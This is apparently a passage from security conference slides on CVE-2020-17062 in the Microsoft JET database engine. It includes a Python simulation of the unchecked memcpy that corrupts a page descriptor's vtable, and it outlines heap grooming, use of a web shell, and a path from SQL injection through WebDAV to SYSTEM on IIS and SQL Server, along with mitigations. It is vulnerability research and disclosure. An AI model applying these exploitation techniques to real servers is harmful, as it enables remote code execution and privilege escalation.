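    mem[0:len(PAGE_HEADER) * 4] = pack(PAGE_HEADER)
    off = PAGEDESC - PAGE_BASE
    mem[off:off + len(PAGEDESC_BEFORE) * 4] = pack(PAGEDESC_BEFORE)
    return mem


def build_source():
    """The record being written into the page; only its tail is known from the slide."""
    src = bytearray(SRC_LEN)
    src[SRC_TAIL_OFFSET:] = pack(SRC_TAIL)[:SRC_LEN - SRC_TAIL_OFFSET]
    return src


def row_offset(mem):
    """*(WORD *)(v5 + 14) & 0x3FFF, exactly as in the decompiled memcpy call."""
    return struct.unpack_from("<H", mem, 14)[0] & 0x3FFF


def copy_fits(mem, length):
    """The bounds check acecore does not perform before the memcpy."""
    return row_offset(mem) + length <= PAGE_SIZE


def unchecked_memcpy(mem, src, length):
    """memcpy(v5 + row_offset, src, length) with no regard for the page end.
    Returns the destination address."""
    dst = row_offset(mem)
    mem[dst:dst + length] = src[:length]
    return PAGE_BASE + dst


def dword_at(mem, addr):
    return struct.unpack_from("<I", mem, addr - PAGE_BASE)[0]


if __name__ == "__main__":
    mem, src = build_memory(), build_source()
    print("row offset %#x, copy fits page: %s" % (row_offset(mem), copy_fits(mem, SRC_LEN)))
    print("PageDesc vtable before: %#x" % dword_at(mem, PAGEDESC))
    unchecked_memcpy(mem, src, SRC_LEN)
    print("PageDesc vtable after:  %#x" % dword_at(mem, PAGEDESC))
```

Source offset 0x43c lands at page offset 0xbcc + 0x43c = 0x1008, which is why the first dword of the PageDesc becomes 41004100 ('A','A' as UTF-16 at odd alignment) and the next call through the vtable faults; the two bytes left over at the end of the copy turn 18071008 at offset 0x1018 into 18073f00, matching the "after" dump.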
How to find CVE-2020-17062
• Power of mutations on SQL queries
• Heap grooming
• Execute multiple queries in one database connection
• Try/catch each query in the web shell
CVE-2020-17062 Demo
Vulnerabilities in three attack scenarios
• Old
• From WinXP to Win10, over 20 years.
• Easy
• Weak or no mitigations: no CFG in msjet40.dll, msrd3x40.dll, acecore x86, etc.
• Severe
• Remote RCE as SYSTEM: code execution as DefaultAppPool or MSSQLSERVER, both of which hold SeImpersonatePrivilege, is escalated with token kidnapping.
• Microsoft does NOT treat NETWORK SERVICE/LOCAL SERVICE to SYSTEM as a security boundary.
Summary
• Feature or vulnerability?
• The WebDAV feature opens a new world for attackers: with a SQL injection, remotely attacking IIS and SQL Server becomes as easy as locally attacking the Microsoft JET database engine. A great number of new vulnerabilities were found in the Microsoft JET database engine and could be used to attack IIS and SQL Server.
• Backwards compatibility is bad.
• All Windows systems released in the last decades, including WIP (Windows Insider Preview), are compatible with the ~30 years old Microsoft JET database engine.
• Defense and mitigation
• Pay more attention to WebDAV.
• In the SQL Server scenario the injected query only reaches the remote JET file when "Ad Hoc Distributed Queries" is enabled or the application login can enable it, so keep that option off and keep web application logins out of sysadmin.
One more thing
• Security boundary
• JET vulnerabilities make “SQL query execution (on controllable JET database)”
equal “native code execution”.
• remote attack surface
• SQL query execution (on controllable JET database) in IIS/SQL Server = native code
execution in IIS/SQL Server
• from SQL Injection to remote SYSTEM.
• local attack surface
• ???
Acknowledgements
• Thanks to Zhibin Zhang
Q&A
